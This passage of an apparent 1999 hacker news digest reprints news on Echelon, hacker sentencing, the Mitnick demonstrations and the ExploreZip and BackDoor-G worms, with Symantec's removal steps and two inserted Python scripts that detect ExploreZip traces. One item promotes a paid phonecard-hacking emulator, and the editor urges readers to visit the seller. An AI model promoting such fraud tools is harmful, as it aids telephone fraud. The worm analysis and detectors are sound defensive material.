9. Detroit-Ann Arbor-Flint - - $61,379,449
10. Atlanta - - $50,479,623
@HWA
19.0 Congress and NSA tangle over Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 9th 1999
From HNN http://www.hackernews.com/
contributed by oolong
The US Congress and the NSA seem to be butting heads
over ECHELON. While all this sounds altruistic, you can
bet that it's the beginning of a high level power struggle
over who controls the information.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0531/web-nsa-6-3-99.html
JUNE 3, 1999 . . . 18:34 EDT
Congress, NSA butt heads over Echelon
BY DANIEL VERTON (dan_verton@fcw.com)
Congress has squared off with the National Security Agency over a
top-secret U.S. global electronic surveillance program, requesting top
intelligence officials to report on the legal standards used to prevent privacy
abuses against U.S. citizens.
According to an amendment to the fiscal 2000 Intelligence Authorization Act
proposed last month by Rep. Bob Barr (R-Ga.), the director of Central
Intelligence, the director of NSA and the attorney general must submit a
report within 60 days of the bill becoming law that outlines the legal standards
being employed to safeguard the privacy of American citizens against Project
Echelon.
Echelon is NSA's Cold War-vintage global spying system, which consists of a
worldwide network of clandestine listening posts capable of intercepting
electronic communications such as e-mail, telephone conversations, faxes,
satellite transmissions, microwave links and fiber-optic communications traffic.
However, the European Union last year raised concerns that the system may
be regularly violating the privacy of law-abiding citizens [FCW, Nov. 17,
1998].
However, NSA, the supersecret spy agency known best for its worldwide
eavesdropping capabilities, for the first time in the history of the House
Permanent Select Committee on Intelligence refused to hand over documents
on the Echelon program, claiming attorney/client privilege.
Congress is "concerned about the privacy rights of American citizens and
whether or not there are constitutional safeguards being circumvented by the
manner in which the intelligence agencies are intercepting and/or receiving
international communications...from foreign nations that would otherwise be
prohibited by...the limitations on the collection of domestic intelligence," Barr
said. "This very straightforward amendment...will help guarantee the privacy
rights of American citizens [and] will protect the oversight responsibilities of
the Congress which are now under assault" by the intelligence community.
Calling NSA's argument of attorney/client privilege "unpersuasive and
dubious," committee chairman Rep. Peter J. Goss (R-Fla.) said the ability of
the intelligence community to deny access to documents on intelligence
programs could "seriously hobble the legislative oversight process" provided
for by the Constitution and would "result in the envelopment of the executive
branch in a cloak of secrecy."
@HWA
20.0 Emutronix Phone Hacking Products releases new Mach emulator
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 9th 1999
From HNN http://www.hackernews.com/
Emutronix Revs Mach
contributed by Fr3akm4n
Emutronix Phonecard Hacking Products have released
their latest version of the Mach Emulation Software.
Version 2.1 incorporates an easier working panel and is
much more user friendly.
Emutronix
http://fly.to/mach3
(I'd check this site out b4 it gets closed down; cards start at $350 with a
one year guarantee for any country except France... - Ed )
@HWA
21.0 Is That Spelled With a "PH" or an "F"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 10th 1999
From HNN http://www.hackernews.com/
contributed by smith
The Concise Oxford Dictionary has added some new
words to its vernacular. One notable inclusion is the
word "Phreaking" with a definition of hacking into the
telephone network. Other new words include firewall and
portal among others.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2272766,00.html
The Concise Oxford Dictionary
http://www.oed.com
@HWA
22.0 The Demonizing of the Hacker
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 10th 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
Are years in jail the correct answer for teenage script
kiddies who deface web pages? Are dangerous
precedents being created today that will limit personal
freedom tomorrow? Are we running the risk of turning
criminals into cultural icons? Peter Wayner takes a look
at these complex questions.
Salon
http://www.salonmagazine.com/tech/feature/1999/06/09/hacker_penalties/index.html
Should hackers spend years in prison?
Stiff penalties for computer trespassing could create a broad new
class of criminal -- including you and me.
- - - - - - - - - - - -
BY PETER WAYNER
June 9, 1999 | The FBI recently declared war on those
pesky hackers -- again. The news is filled with the
story of some group known as Global Hell that is
breaking into Web sites and causing mayhem. The
FBI is cracking down, confiscating computers and
taking names; and some hackers are actually fighting
back and shutting down some government Web sites.
The press loves hackers because computer crime is
something new. (I'm using "hackers" the way the
media does, to describe those who get their kicks
breaking into computer systems, rather than the older
usage describing those who delight in difficult software
coding work.) Murder, rape, drug dealing, theft and
fraud continue as always, with ups and downs in their
rates -- but teenagers breaking into Web sites is
something no one has seen before.
The problem with the war against hackers is that most
of what the hackers are supposedly doing would be
trivial if it weren't happening on the Internet. The
typical hacker attack on a Web site isn't much
different from scrawling graffiti on the outside of a
building. Many attackers are just poking around -- like
suburban teenagers who hop a fence to jump into a
pool.
All of this would be great theater and a nice distraction
from the war in Kosovo if it weren't inspiring some
serious reprisals in the courts -- and some ominous
inflation in sentencing that could wind up affecting
everyone who uses computers in his or her daily life.
Wars on hackers are usually followed by calls for
legislators to "do something!" and campaigns for new
laws to crack down on the bad guys. The problem is
that "doing something" often produces laws that treat
the same action much more harshly in cyberspace than
in "meatspace."
The archetype of the demon hacker is
Kevin Mitnick, a young man who has
spent more than four years in jail
waiting for his trial. When he was
arrested, Monica Lewinsky was in her
last year of college. During this time,
Mitnick and his attorneys have jousted
with government lawyers in endless
pre-trial maneuvers that seem to have
ended recently when Mitnick decided to plead guilty,
probably hoping to receive a sentence that would be
limited to time served. But even that deal is uncertain
and taking forever to evolve; meanwhile, for Mitnick
it's just prison without a trial and with no bail.
Many, no doubt, see the crackdown on folks like
Kevin Mitnick as a great deal for society: Information
can be stolen just like anything else; surely the thieves
who traffic in such goods should be locked up, just
like car-jackers and muggers.
But there's also a hidden danger. The precedents that
the courts set now for dealing with demons like
Mitnick will also apply equally to everyone who
follows. And it's not clear that the world is ready for
Mitnick-like sentences for the crimes he might have
committed, which remain murkily defined.
Think about it: Someone who reads another person's
Rolodex is just a snoop, but someone who clicks
through somebody else's Palm Pilot is hacking a
computer database.
It's easy to see just how slippery the calculus of evil
gets on the cutting edge of technology. 2600
Magazine, The Hacker Quarterly, recently posted
letters from computer manufacturers like Sun and
Motorola estimating their losses to Mitnick's alleged
theft of computer source code. After Mitnick's arrest,
he was said to have stolen billions of dollars of
information. Some companies calculated their loss by
simply listing the hundreds of millions of dollars in
development cost of the software affected -- that is,
the cost of all the programmers, their computers and
other overhead. Other companies were a bit more
careful and noted that the value was difficult to judge,
but that recalls of products like cell phones could be
costly.
The problem is, the price tag of information is almost
impossible to determine. If Mitnick did take a copy of
these companies' source code, the companies weren't
denied the use of it, as when a mugger steals cash.
Mitnick's lawyers seem ready to point out that the
companies involved didn't bother to announce an
official price on what they lost to Mitnick -- something
that the Securities and Exchange Commission requires
public companies to do if the losses are significant
enough. That would have required strict accounting
measures.
To make matters even cloudier, in the meantime, Sun
Microsystems began giving away the source code to its
operating system to students around the world. In
other words, if Mitnick had only waited a few years,
enrolled in a university and asked nicely, he might
have been a poster boy for Sun's charity instead of a
prisoner. Today, Sun is even circulating the source
code to products like Java in hope of recruiting
customers and snagging bug fixes. The company is
practically begging people around the world to come
take a look at its code.
This big change in the customs and attitudes of the
software industry strains the arguments against
hackers. If giving away the source code is now a
"good thing" for corporations, did Mitnick and the
other hackers do a smaller good thing by grabbing it
ahead of time? Is Mitnick now a bit closer to being a
Robin Hood instead of a demon? If Linux triumphs,
will children be told tales of the dark days when the
Sheriff of Nottingham sat on the boards of all of the
corporations and forced them to keep their source
code proprietary so only the nobles could enjoy its
bounty? Is it true that begging forgiveness is always
easier than asking permission?
Such questions may be impossible to answer, but they
illustrate just how confusing it can be in the
nether-netherworld of information's hall of mirrors. As
a commodity, information is fundamentally different
from objects, and society has always graced it with
special respect. The journalists who printed the stories
about the allegedly racist words that appeared on a
secret audio tape of Texaco employees looked like
crusaders. But if it had been a digital tape, the
reporters could be painted as hacking data compiled by
a Texaco employee on Texaco time.
In the long run, society is going to have to think
differently about hackers and the crimes with which
they are charged. Taking information when it's printed
on paper is not always bad, and there's no reason we
should change this rule just because the information is
stored on a computer disk. The intent of the criminal
and the extent of the malice has always played a
crucial role in our system of criminal justice. Many
owners of things will forgive a theft if the "borrower"
merely returns it unharmed. Crimes like trespassing
are rarely prosecuted if someone just hops a fence and
does no damage.
Computers and the Internet continue to frighten
people, but prosecuting hackers runs the danger of
setting nasty precedents that will begin to snare regular
people, not programmers. Many convicted hackers are
released from prison only to be denied the ability to
use a computer or the Internet. In the past, this made
it impossible for a person to get work as a
programmer; today, they can't even push the order
screen at McDonald's. After all, it's hooked up to a
central database -- who knows what havoc a hacker
could wreak while punching up an order of fries?
One of the best ways to put this all in context is to
take yourself back in time 100 years to the turn of the
last century, when auto racing was just beginning to
roar across the scene. The machines were grand in
size and sound if not in speed -- Emile Levassor won
the 1895 Paris-Bordeaux race with his
four-horsepower jack rabbit that covered the distance
at an average speed of 14.9 mph. Feats of technical
prowess like that frightened the world, and by 1903
the French government was shutting down auto races
-- or restricting the death-defying machines to a
bearable 20 mph.
A few decades later, James Dean became a rebel
automobile hacker who scared parents around the
globe. Today, he's just another cutie pie competing
with Hanson for poster space on dorm room walls.
One era's demon is another's icon. Is teen idol the next
stop for Kevin Mitnick?
salon.com | June 9, 1999
- - - - - - - - - - - -
About the writer
Peter Wayner is the author of
"Disappearing Cryptography," "Digital
Cash" and "Digital Copyright Protection."
@HWA
23.0 More Email Worms/Trojan
~~~~~~~~~~~~~~~~~~~~~~~~
June 10th 1999
From HNN http://www.hackernews.com/
More Email Worms/Trojan
contributed by zuc
Symantec has discovered a new malicious piece of
software that travels as an email attachment named
"zipped_files.exe". Similar to Melissa this worm/trojan
uses the MAPI commands and Microsoft Outlook on
Windows systems to replicate. This code was originally
discovered in Israel.
Symantec
http://www.symantec.com/avcenter/venc/data/worm.explore.zip.html
Worm.ExploreZip
Virus Name: Worm.ExploreZip
Aliases: W32.ExploreZip Worm
Infection Length: 210,432 bytes
Area of Infection: Windows System directory, Email Attachments
Likelihood: Common, Worldwide
Detected as of: June 6, 1999
Characteristics: Worm, Trojan Horse
Overview:
Worm.ExploreZip is a worm that contains a malicious payload. The worm
utilizes Microsoft Outlook, Outlook Express, or Exchange to mail itself out by
replying to unread messages in your Inbox. The worm will also search the
mapped drives and networked machines for Windows installations and copy
itself to the Windows directory of the remote machine and modify the
WIN.INI accordingly.
The payload of the worm will destroy any file with the extension .h, .c, .cpp,
.asm, .doc, .ppt, or .xls on your hard drives, any mapped drives, and any
network machines that are accessible each time it is executed. This continues
to occur until the worm is removed.
You may receive the worm as an attachment called zipped_files.exe. When
run, this executable will copy itself to your Windows System directory with the
filename Explore.exe or to your Windows directory with the filename
_setup.exe. The worm modifies your WIN.INI or registry such that the file
Explore.exe is executed each time you start Windows.
The worm was first discovered in Israel and submitted to the Symantec
AntiVirus Research Center on June 6, 1999.
Technical Description:
Worm.ExploreZip utilizes MAPI commands and Microsoft
Outlook/Microsoft Exchange on Windows 9x and NT systems to propagate
itself.
The worm e-mails itself out as an attachment with the filename
zipped_files.exe in reply to unread messages it finds in your Inbox. Once it
responds to a message in your Inbox, it will mark it so it will not respond to
the message again. The e-mail message sent may appear to come from a
known e-mail correspondent in response to a previously sent e-mail with the
appropriate subject line and contains the following text:
Hi Recipient Name!
I received your email and I shall send you a reply ASAP.
Till then, take a look at the attached zipped docs.
bye or sincerely Recipient Name
The worm will continue to monitor the Inbox for new messages and respond
accordingly.
The worm will also search the mapped drives and networked machines for
Windows installations and copy itself to the Windows directory of the remote
machine and modify the WIN.INI accordingly.
Once the attachment is executed, it may display a message window (the screenshot is not reproduced in this copy).
The button displayed is the "OK" button and is dependent on the language of
the infected operating system. The example above was taken from a Hebrew
Windows system.
The worm also copies itself to the Windows System (System32 on Windows
NT) directory with the filename Explore.exe or _setup.exe and also modifies
the WIN.INI file (Windows 9x) or the registry (on Windows NT) so, the
program is executed each time Windows is started. You may find this file
under your Windows Temporary directory or your attachments directory as
well depending on the e-mail client you are using. E-mail clients will often
temporarily store e-mail attachments in these directories under different
temporary names.
Payload:
In addition, when Worm.ExploreZip is executed, it also searches through the
C through Z drives of your computer system and accessible network machines
for particular files. The worm selects a series of files to destroy of multiple file
extensions (including .h, .c, .cpp, .asm, .doc, .xls, .ppt) by calling CreateFile()
and making them 0 bytes long. One may notice extended hard drive activity
when this occurs. This can result in non-recoverable data.
This payload routine continues to happen while the worm is active on the
system. Thus, any newly created files matching the extensions list will be
destroyed as well.
Repair Notes:
Symantec AntiVirus Research Center has also provided a small utility called
KILL_EZ to remove the virus from memory to avoid rebooting from a clean
system disk. For more information on KILL_EZ utility, refer to the following
URL:
http://www.sarc.com/avcenter/kill_ez.html
To remove this worm manually, one should perform the following steps:
1. Remove the line
   run=\Explore.exe
   or
   run=\_setup.exe
   from the WIN.INI file for Windows 9x systems.
   For Windows NT, remove the registry entry
   HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run
   which will refer to Explore.exe or _setup.exe.
2. Delete the file Explore.exe or _setup.exe. One may need to reboot first
   or kill the process using Task Manager or Process View (if the file is
   currently in use).
Norton AntiVirus users can protect themselves from this worm by
downloading the current virus definitions either through LiveUpdate or from
the following webpage:
http://www.symantec.com/avcenter/download.html
Write-up by: Eric Chien
Written: June 6, 1999
Update: June 11, 1999
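As an added example (not Symantec's KILL_EZ utility, nor any code from the write-up), the following Python script checks a host for the indicators the write-up describes: the WIN.INI run= line naming Explore.exe or _setup.exe, and the payload's signature of zero-byte files with the targeted extensions. The sample WIN.INI text and the scratch directory are constructed for demonstration; the NT registry value named above is not checked here.

```python
import os
import tempfile

# File names the worm installs under and extensions its payload truncates
# (both lists from the Symantec write-up); compared case-insensitively.
WORM_BINARIES = ("explore.exe", "_setup.exe")
TARGET_EXTS = {".h", ".c", ".cpp", ".asm", ".doc", ".ppt", ".xls"}


def _basename_lower(prog):
    """Basename of a Windows or POSIX path, lower-cased. The worm's line
    ('run=\\Explore.exe') carries no drive letter, so only the name is compared."""
    return prog.replace("\\", "/").rsplit("/", 1)[-1].lower()


def win_ini_run_entries(win_ini_text):
    """Return (key, program) pairs from WIN.INI's [windows] section whose run=
    value (or load=, the other WIN.INI autostart key, checked here as an extra)
    names a worm binary. Hand-parsed: keys are case-insensitive and one value
    may list several programs."""
    hits, section = [], None
    for raw in win_ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "windows" or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key.lower() in ("run", "load"):
            for prog in value.replace(",", " ").split():
                if _basename_lower(prog) in WORM_BINARIES:
                    hits.append((key.lower(), prog))
    return hits


def truncated_files(root, exts=TARGET_EXTS):
    """Return root-relative paths ('/' separators) of zero-byte files with an
    extension in exts: the payload's signature (CreateFile() with truncation).
    Run only after the worm process is gone; while active it re-truncates."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if os.path.splitext(fn)[1].lower() not in exts:
                continue
            full = os.path.join(dirpath, fn)
            try:
                if os.path.getsize(full) == 0:
                    found.append(os.path.relpath(full, root).replace(os.sep, "/"))
            except OSError:
                pass  # unreadable entry: report nothing rather than guess
    return sorted(found)


# Constructed sample WIN.INI modelled on the write-up's 'run=\Explore.exe' line.
SAMPLE_WIN_INI = r"""[windows]
load=
run=\Explore.exe
NullPort=None
"""


def build_demo_tree():
    """Constructed sample: a scratch directory holding two intact files and two
    zero-byte files with targeted extensions. Returns its root path."""
    root = tempfile.mkdtemp(prefix="explorezip_demo_")
    os.makedirs(os.path.join(root, "src"))
    samples = {
        "notes.txt": b"",                  # zero bytes but not a targeted extension
        "budget.xls": b"intact workbook",  # targeted extension, still has content
        "src/main.c": b"",                 # as left by the payload
        "report.doc": b"",                 # as left by the payload
    }
    for rel, data in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    print("WIN.INI autostart hits:", win_ini_run_entries(SAMPLE_WIN_INI))
    root = build_demo_tree()
    print("zero-byte targeted files under", root, "->", truncated_files(root))
```

The zero-byte scan is an inventory of what the payload hit, not a recovery tool: a file truncated this way has to come back from backup, which is why the scan should be run only after the Explore.exe process has been killed or the machine rebooted clean.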
@HWA
24.0 Stanford Searches for "Hacker"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 10th 1999
From HNN http://www.hackernews.com/
Stanford Searches for "Hacker"
contributed by Dead.Under.Water
Stanford University was a victim of a spammer recently.
A message, sent to some 25,000 Stanford email
accounts, accused the school of giving housing
preferences to minorities. Prosecutor Julius Finkelstein,
head of Santa Clara County's high-tech crimes unit, said
the "hacker" could be charged with such offenses as
unauthorized use of a computer account and
harassment via e-mail. Evidently sending hate filled
emails grants you the hacker moniker?
Yahoo News
http://dailynews.yahoo.com/headlines/ap/technology/story.html?s=v/ap/19990603/tc/racist_mail_1.html
(this link didn't work as of June 24th -Ed)
@HWA
25.0 Mitnick Demo Pictures now Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 10th 1999
From HNN http://www.hackernews.com/
Mitnick Demo Pictures now Available
contributed by Macki
Pictures of the FREE KEVIN Demonstrations held last
week in front of federal courthouses across the country
have been posted. Pictures from the demonstrations in
Cleveland, New York, and Moscow have been made
available at the FREE KEVIN Demos website. Kevin
Mitnick's sentencing hearing is scheduled for Monday,
June 14th.
FREE KEVIN Demonstrations
http://www.2600.com/demo/index.html
26.0 Does Cracking Affect Consumer Confidence?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 10th 1999
From HNN http://www.hackernews.com/
Does Cracking Affect Consumer Confidence?
contributed by evenprime
Eric Lundquist thinks that it is wrong to crack servers
because doing so undermines consumers' confidence in
e-commerce. (In my opinion consumers would be wise
not to trust e-commerce.) Interesting how the author
never gets around to blaming vendors who tell people to
place their trust in the rubbish that is being sold.
ZD Net
http://www.zdnet.com/zdnn/stories/comment/0,5859,406094,00.html
27.0 Worm.ExploreZip is Causing Massive Damage
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 11th 1999
From HNN http://www.hackernews.com/
contributed by Merlock
Worm.ExploreZip is quickly spreading across the world.
First discovered last Sunday in Israel it has propagated
into some of the largest companies in the US. The
transmission method of this program is similar to Melissa
which uses the email addresses in Microsoft Outlook
address book, Worm.ExploreZip however, automatically
replies to the incoming email of MS Exchange or MS
Outlook users. Unlike Melissa Worm.ExploreZip carries a
very malicious payload that will actually delete certain
files and modify others. Companies such as Boeing, Price
Waterhouse Coopers, GTE, and General Electric have
lost entire hard drives to this virus. Many companies are
attempting to be proactive by disconnecting themselves
from the internet. Only users of Microsoft products are
affected by this latest threat.
ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/worm990610.html
C|Net
http://www.news.com/News/Item/0,4,37658,00.html?st.ne.fd.gif.d
MSNBC
http://www.msnbc.com/news/278660.asp
ZD Net
http://www.zdnet.com/pcweek/stories/news/0,4153,2273659,00.html
Nando Times
http://www.techserver.com/story/body/0,1634,58370-93054-664175-0,00.html
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,11334,00.html
ZD Net
http://www.zdnet.com/zdnn/special/doublevirus.html
C|Net;
Data virus forces email shutdowns
By Kim Girard
Staff Writer, CNET News.com
June 10, 1999, 7:10 p.m. PT
update Corporations are scrambling to cope with a new data-destroying virus that is forcing the shutdown of email
systems nationwide.
The virus, first reported to the Symantec Antivirus Research Center on Sunday by five companies in Israel, is called
Worm.ExploreZip or Troj_Explore.Zip. The worm uses Mail Application Programming Interface (MAPI) commands and Microsoft
Outlook on Windows systems to propagate itself, Symantec said.
In some ways, the virus is the sequel to the Melissa virus, which spread with unprecedented speed in March. Worm.ExploreZip
spreads from computer to computer by taking advantage of automation features available to people using Microsoft email software
on Windows machines.
Although the new virus doesn't spread as fast as Melissa, it causes more damage, according to antivirus experts, deleting
Microsoft Word, Excel, and Powerpoint document files, among others.
Several firms have shut down their email systems entirely while IS staff root out the virus,
according to Symantec.
Boeing was hit particularly hard. The Seattle-based aerospace giant shut down its email system,
which is used by at least 150,000 employees, at 2:30 p.m. today, a company spokesman said.
The company was still assessing the damage caused by the virus, but the spokesman, who
asked not to be named, said he knew of at least one employee whose entire hard drive was wiped
out.
"As soon as we became aware of it, we told everyone, and we put a message up on our internal
Web site," he said. Late in the day the email still had not been restored. The company hopes to
have it back up by tomorrow.
PricewaterhouseCoopers took down its entire email system, used by 45,000 U.S. employees,
also at 2:30 p.m. in response to the virus. The company was just bringing up parts of the system
at 7 p.m., a company spokesman said, but he didn't know how much damage had been done or
how many workers had been affected.
Some companies said they disarmed the virus--actually a software "worm"--before it could cause
many problems. Microsoft, for example, disconnected its email servers from the Internet at about 9
a.m. so that programmers could work on an antidote, company spokesman Dan Leach said. The
servers were up and running two hours later, he added.
Employees of antivirus software maker Symantec report that they have received email that
includes the worm, which arrives as an attachment to the missives. Companies such as General
Electric and Southern Company have had files deleted by the virus, according to Bloomberg.
Virus protection firm Trend Micro spokeswoman Susan Orbuch said earlier today that the company had received 107 calls from
customers concerning the virus. Thirteen of those calls came from those already infected, she said.
Orbuch said that Trend Micro knew of five large companies that had been infected, as well as several public relations firms and a
magazine. She declined to name the companies.
Nate Meyer, spokesman for Credit Suisse First Boston, said the virus had struck the company's
offices in New York, San Francisco, and Palo Alto, California, and that other offices worldwide may
have been affected. He said he did not know how many of the company's computers were infected.
Meyer said the Credit Suisse's technology department had been working on the problem for much of
the day and had sent out a warning about it this morning. But he said the virus did not seem to have
slowed the company's operations, adding that it had not disrupted the investment company's stock
trading. Meyer noted that his own email had been working throughout the day.
Quick repairs
Representatives at AT&T and Intel reported that they were able to quickly repair their systems after
being hit by the virus.
"These are things that we have to do because of the communications reality that we live in today,"
an AT&T spokeswoman said.
The virus disrupted work at Cambridge, Massachusetts-based industry analyst firm Forrester
Research, where Internet access, including email, was cut off. Another analyst firm, Current
Analysis, sent email to customers warning them not to open any email attachments coming from the
firm with the .exe extension because an employee's PC had been infected.
The infected email may contain the message: "Hi [recipient name]! I received your email and I shall send you a reply ASAP. Till
then, take a look at the attached zipped docs. bye."
Unlike the Melissa virus, which harvested from a user's address book, the new virus raids an email in-box when executed through
Microsoft Exchange or Outlook. The worm attaches itself as a file called zip_files.exe and is sent off with a return email. Although
the virus isn't expected to spread as quickly and to as many computers as Melissa did, it does destroy files.
"It's an .exe file posing as a Zip file," said Eric Chien, senior researcher at the Symantec Antivirus Research Center. The worm is
particularly insidious because it searches through hard drives and destroys files with extensions of .doc, .xls, .ppt, .c, .cpp, .h, or
.asm, he said.
Chien said that means whoever wrote the virus was targeting corporations--seeking to destroy developers' source code, as
well as documents created using Microsoft Office applications, such as Word and Excel.
"It singles out those files and destroys them," he said. "This hits the local drive and the file server."
Extent of damage not known
Chien said it is unclear how much damage the virus has done. "We've received multiple reports from major corporations in
the U.S.," he said. "What we're hoping is that the initial jump on this Sunday night will prevent it from spreading."
Panda Software said it has added free downloads for the detection and disinfection of the virus--which it called "extremely
dangerous"--on its Web site. The company also urged people to update antivirus software.
Esther Shin, a public relations specialist at Aventail, a Seattle-based business-to-business e-commerce firm, said two of
her colleagues encountered the virus this morning. One of them lost all the files on his hard drive after he opened the
attachment, she added.
The email was worded to make the recipient believe that the message came from a Microsoft employee, she said. Shin
said she got a similar email but didn't open the attachment.
"When I got hit I called all my contacts," she said.
Bloomberg and News.com's Troy Wolverton, Dan Goodin, and Tim Clark contributed to this report.
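As an added example, not code from CNET, Symantec or HWA, here is a small gateway-side check for the lure the article describes: it parses an RFC 822 message, flags the zipped_files.exe attachment by name and, because the file is an .exe posing as a Zip, also by its MZ header, and matches the canned body text. The two sample messages are constructed in the script; the fake attachment bytes are filler, not the worm.

```python
import email
from email import policy
from email.message import EmailMessage

# Attachment name and canned body text from the CNET article / Symantec write-up.
WORM_ATTACHMENT = "zipped_files.exe"
LURE_PHRASES = (
    "i received your email and i shall send you a reply asap",
    "take a look at the attached zipped docs",
)


def worm_indicators(raw_message):
    """Parse an RFC 822 message (bytes) and return the reasons it resembles
    an ExploreZip reply; an empty list means nothing matched.
    Checks, in order: attachment name, attachment content (an .exe posing as a
    Zip still starts with the PE 'MZ' magic), then the lure sentences."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    reasons = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name == WORM_ATTACHMENT:
            reasons.append("attachment named " + name)
        elif name.endswith(".exe"):
            reasons.append("executable attachment " + name)
        data = part.get_payload(decode=True) or b""
        if data[:2] == b"MZ":
            reasons.append((name or "unnamed attachment") + " has an MZ (PE executable) header")
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content().lower() if body is not None else ""
    for phrase in LURE_PHRASES:
        if phrase in text:
            reasons.append("lure text: " + phrase)
    return reasons


def build_sample(worm):
    """Constructed sample reply (not a real capture). With worm=True it carries
    the lure text and a fake 'zipped_files.exe' whose bytes are NOT the worm,
    just an MZ header followed by filler; otherwise an ordinary reply with a zip."""
    msg = EmailMessage()
    msg["From"] = "alice@example.com"
    msg["To"] = "bob@example.com"
    msg["Subject"] = "RE: Q2 figures"
    if worm:
        msg.set_content(
            "Hi Bob!\nI received your email and I shall send you a reply ASAP.\n"
            "Till then, take a look at the attached zipped docs.\nbye\n"
        )
        msg.add_attachment(b"MZ" + b"\x00" * 62 + b"constructed filler, not the worm",
                           maintype="application", subtype="octet-stream",
                           filename=WORM_ATTACHMENT)
    else:
        msg.set_content("Hi Bob,\nthe Q2 figures are in the attached workbook.\n")
        msg.add_attachment(b"PK\x03\x04" + b"constructed zip stub",
                           maintype="application", subtype="zip",
                           filename="q2_figures.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for label, flag in (("worm-like", True), ("benign", False)):
        print(label, "->", worm_indicators(build_sample(flag)) or ["clean"])
```

The name check alone is brittle (a renamed copy slips through), and the phrase check alone produces false positives on legitimate replies that quote the lure; the header check is the one that survives trivial variants, which is why all three are reported separately rather than collapsed into one verdict.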
@HWA
28.0 Don't Forget About BackDoor-G, it is Still Around
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 11th 1999
From HNN http://www.hackernews.com/
contributed by Weld Pond
Don't forget about BackDoor-G. It also arrives as an
email attachment but instead of deleting files this one
could allow someone else to control your computer
behind the veil of a screensaver.
The Irish Times
http://www.ireland.com/newspaper/finance/1999/0604/fin320.htm
Bug hits big screen by the backdoor
Backdoor-G virus arrives by e-mail and sets up a
screensaver which lets hacker control computer
remotely
As if you didn't already have enough worries. The wary
computer user already feels bunkered in and hunkered down,
in between hiding behind firewalls, running anti-virus programs
and keeping a watchful eye on suspicious-looking e-mails.
You have to look out for infected files on floppy disks, panic
over the latest holes in e-mail programs, and be cautious with
how you set up company and personal websites. It's almost
enough to send you back to a manual typewriter.
Now comes an insidious screensaver virus - a new computer
devastator that sneaks into your system via an e-mail and sets
up a screensaver which lets some badguy hacker control your
computer remotely, download files, and all that other stuff that
appears in Tom Cruise films but which we would all rather
believe couldn't happen in real life.
According to security software company Network Associates,
Backdoor-G is a so-called "trojan horse" program, which
arrives into your computer hidden inside an attack program
which potential victims receive as an unsolicited e-mail. The
program has reportedly taken the form of both a screensaver
and an update to a computer game.
Open the e-mail and the program installs itself, allowing
Backdoor-G to turn the victim's computer into a client system.
In other words, it allows a hacker to operate the victim's
computer remotely over the Internet. The hacker can thus gain
access to just about anything on the victim's computer.
Unfortunately, it's also almost impossible to detect once it
executes because it is capable of changing its file name. And
according to Network Associates, it spreads everywhere in
your computer's system.
Admittedly, the screensaver aspect of this virus has its
amusement potential - hmmm, can't we all imagine a bitter and
twisted screensaver we'd like to design to announce our
conquest of the computer belonging to some particularly
detested person in our lives? But the arrival of Backdoor-G is
probably more apt to make you sigh in exasperation.
Computers were supposed to make life easier, more
manageable, more controllable. Okay, you can stop laughing,
but you know what I mean. Instead, they just seem to bring
more stress, hair loss, heartburn and overly-chewed fingernails.
But it's perhaps wise to remind computer users that many, if
not most, aggravations come not from the machines or even,
sometimes, the software. They come from humans who still
make far too many assumptions about what computers,
software, and the Internet can or cannot do.
Partly, that's our fault, because we accept products from
hardware and software vendors which in any other industry
would be considered too unreliable, unstable and under-tested
to be released onto the market.
We believe the vendors when they excuse themselves by telling
us it's all too complicated to explain, it's the nature of the
medium and so forth. That's appalling, but as long as we lack
the collective spine to demand better, we're stuck with what
we get.
But it's hard to see how we can obliterate the virus problem,
since a computer is a sitting duck for viruses because of the
way in which we use them - sharing disks, transferring files,
going on and off the Net and downloading things from places
we don't know. Few people take even basic precautions
against viruses and so, these things spread. In addition, many
people never bother to make backups of their work, and thus
are twice devastated if struck by a virus or another form of
computer attack.
And even if the anti-virus software makers come up with a fix
to one virus, some hacker is always brewing another that we
cannot yet imagine. In the days that it takes to create an
antidote, thousands or millions can be hit.
In the case of particularly nasty viruses, entire companies can
be brought down at the cost to the global economy of billions
of pounds.
So what's a poor computer user to do? There's not much else
to recommend but to proceed with caution, which means
educating yourself on how to keep your own machine as clean
as possible by being vigilant against viruses and other forms of
computer attack.
Buy a good virus-scanning software package and use it. Be
wary about what you download off the Net and scan it first.
Don't open e-mail with attachments unless you know the
sender (and even then, be cautious about all attachments).
And create backups. Anyone who has ever lost irreplaceable,
important files off a floppy disk or hard-drive knows the
excruciating pain of that particular experience.
You may still have to clean up a computer if a virus brings it
down - and that's not a pleasant task - but having your files
intact somewhere else at least keeps the misery from reaching
bottomless depths.
A detector for the Backdoor-G virus is online at www.nai.com
@HWA
29.0 MS Antitrust Trial Looks at Security
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 11th 1999
From HNN http://www.hackernews.com/
contributed by m4in
District Court Judge Thomas Jackson has asked a
government expert witness whether removing the
browser from Windows will increase or diminish its
security. Analysts think that the judge is wondering
